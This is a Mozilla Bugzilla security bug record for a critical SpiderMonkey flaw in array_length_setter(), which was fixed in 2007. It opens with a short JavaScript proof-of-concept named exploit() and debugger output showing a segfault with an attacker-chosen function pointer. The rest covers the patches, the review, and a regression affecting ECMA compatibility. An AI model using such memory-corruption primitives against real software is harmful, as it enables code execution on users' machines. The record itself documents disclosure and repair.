Closed Bug 390598 Opened 17 years ago Closed 17 years ago

array_length_setter() is exploitable

Categories

(Core :: JavaScript Engine, defect, P1)

defect

Tracking

()

VERIFIED FIXED
mozilla1.9alpha8

People

(Reporter: sync2d, Assigned: brendan)

References

Details

(Keywords: crash, regression, testcase, Whiteboard: [sg:critical] post 1.8-branch)

Attachments

(3 files, 2 obsolete files)

$ cat array-length.txt
function exploit() {
  var fun = function () {};
  fun.__proto__ = [];
  fun.length = 0x50505050 >> 1;
  fun();
}
exploit();

$ dbg.obj/js array-length.txt
Assertion failure: OBJ_GET_CLASS(cx, obj) == &js_ArrayClass, at jsarray.c:404

$ gdb --eval run --args opt.obj/js array-length.txt
...
Program received signal SIGSEGV, Segmentation fault.
js_Interpret (cx=0xaa0750, pc=0xaa3cfa ":", result=0x97ec84)
    at jsinterp.c:3925
3925                    if (fun->flags & JSFUN_INTERPRETED) {
(gdb) print fun
$1 = (JSFunction *) 0x50505050
Keywords: testcase
Whiteboard: [sg:critical]
Attached patch fix (obsolete) — Splinter Review
Assignee: general → brendan
Status: NEW → ASSIGNED
Attachment #274976 - Flags: review?(igor)
Priority: -- → P1
Target Milestone: --- → mozilla1.9 M8
Attachment #274976 - Attachment is obsolete: true
Attachment #274978 - Flags: review?(igor)
Attachment #274976 - Flags: review?(igor)
Attachment #274978 - Flags: review?(igor) → review+
Comment on attachment 274976 [details] [diff] [review]
fix

This is OK as a security fix.
Attachment #274976 - Flags: review+
(In reply to comment #3)
> (From update of attachment 274976 [details] [diff] [review])
> This is OK as a security fix.

The problem is that

function F() {} F.prototype = []; var x = new F(); x.length = 10; print(x.length);

now prints 0, not 10 as required by ECMA.
(In reply to comment #4)
> (In reply to comment #3)
> > (From update of attachment 274976 [details] [diff] [review] [details])
> > This is OK as a security fix.
> 
> The problem is that
> 
> function F() {} F.prototype = []; var x = new F(); x.length = 10;
> print(x.length);
> 
> now prints 0, not 10 as required by ECMA.

I thought this was an old bug, but I was wrong:

$ ../src.ref/Darwin_DBG.OBJ/js
js> function F() {} F.prototype = []; var x = new F(); x.length = 10;
10
js> x.length
10

Recent regression, due to bug 385393 of course. Let me try to fix it and fix this bug.

/be
(My ../src.ref/ tree pre-dates last night's landings.)

/be
Attachment #274978 - Attachment is obsolete: true
Attachment #274983 - Flags: review?(igor)
Comment on attachment 274983 [details] [diff] [review]
alterna-fix 2, restores lost ECMA compat

This is simple and nice workaround.
Attachment #274983 - Flags: review?(igor) → review+
Flags: blocking1.9+
Fixed:

js/src/jsarray.c 3.116

/be
Status: ASSIGNED → RESOLVED
Closed: 17 years ago
Resolution: --- → FIXED
Flags: in-testsuite+
verified fixed 1.9.0 linux/mac*/windows.
Status: RESOLVED → VERIFIED
Group: core-security
Flags: wanted1.8.1.x-
Keywords: regression
Whiteboard: [sg:critical] → [sg:critical] post 1.8-branch
test checked into 1.9.0, 1.9.1, 1.9.2, tracemonkey. 1.9.3 will get picked up in the next merge.
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Created:
Updated:
Size: